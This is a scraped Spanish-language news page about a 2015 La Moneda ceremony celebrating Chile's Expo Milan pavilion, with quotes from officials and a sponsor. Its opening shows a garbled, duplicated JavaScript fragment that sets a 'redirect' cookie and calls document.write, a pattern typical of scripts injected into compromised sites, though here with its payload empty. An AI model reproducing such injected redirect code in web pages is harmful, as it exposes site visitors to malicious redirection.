=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

Comisionado general y autoridades destacan el éxito de la alianza público-privada

17 Dic 2015

Compartir:

Con total atención los asistentes que estuvieron en el Patio de Las Camelias en la Moneda pudieron conocer los principales logros que obtuvo “El Amor de Chile” durante su funcionamiento en Italia.

“Agradezco a la presidenta, ministros y directores de servicio que están presentes hoy. Este proyecto demostró que cuando todos remamos hacia el mismo lado, se obtienen buenos resultados. Y eso fue lo que tuvimos como experiencia durante nuestra participación”, señaló el comisionado general, Lorenzo Constans. También expuso  los grandes momentos del proyecto, como la obtención de la Medalla de Plata en la categoría Arquitectura y Diseño, el tercer lugar en calidad de restaurantes otorgado por la prensa internacional; y en especial el Día de Chile en septiembre, que contó con un bombardeo de poemas chilenos e italianos en la Plaza del Duomo y la presentación a tablero vuelto de Inti-illimani Histórico en el Open Air Theatre, escenario principal de la muestra.

Tras concluir su presentación, el comisionado general ofició la entrega a la Presidenta Bachelet de dos elementos muy representativos para el proyecto: la bandera chilena del pabellón, cedida por una oficial de Carabineros que fue parte del contingente que representó a la institución en Milán, y de la Medalla de Plata, en manos del director arquitectónico del proyecto, Cristián Undurraga.

Posterior al evento, el canciller Heraldo Muñoz felicitó a la secretaría ejecutiva por los logros alcanzados, indicando que “este fue un proyecto ambicioso que partió con grandes desafíos, pero su resultado fue excelente. Yo estoy muy contento con la forma que se logró mostrar de El Amor de Chile; nuestros poetas, productos, comidas, inclusive la participación de seleccionados nacionales que visitaron la muestra, y en definitiva esperamos que podamos replicar este tipo de iniciativas que benefician mucho la imagen país”.

A su vez, el director General de la DIRECON, Andrés Rebolledo, dijo que “este fue un esfuerzo importante que requirió de una convocatoria público-privada muy significativa. Pudimos mostrar el país en su globalidad, y en particular estuvimos sintonizados con el objetivo de la feria. Chile es un país muy internacionalizado; gran parte de su producción va hacia el extranjero, particularmente el sector agroalimentario y en definitiva fue una gran vitrina que generará iniciativas que van hacia el fortalecimiento del país”.

Por su parte, el gerente de marketing de ARAUCO, Francisco Lozano, mostró su orgullo por el desempeño alcanzado, indicando que “como representante de ARAUCO y chileno es un orgullo haber participado en esta iniciativa. Creo que el país se lució en todos los aspectos; tales como la arquitectura, el valor al emprendimiento local, el tema culinario, y en definitiva el proyecto cumplió al 100%. Para nosotros es un gran hito ver nuestra madera, un recurso natural renovable,  representada de excelente forma en Milán, ciudad que es reconocida como la capital del diseño mundial”.

Revisa la galería AQUÍ 

Partners

Media Partner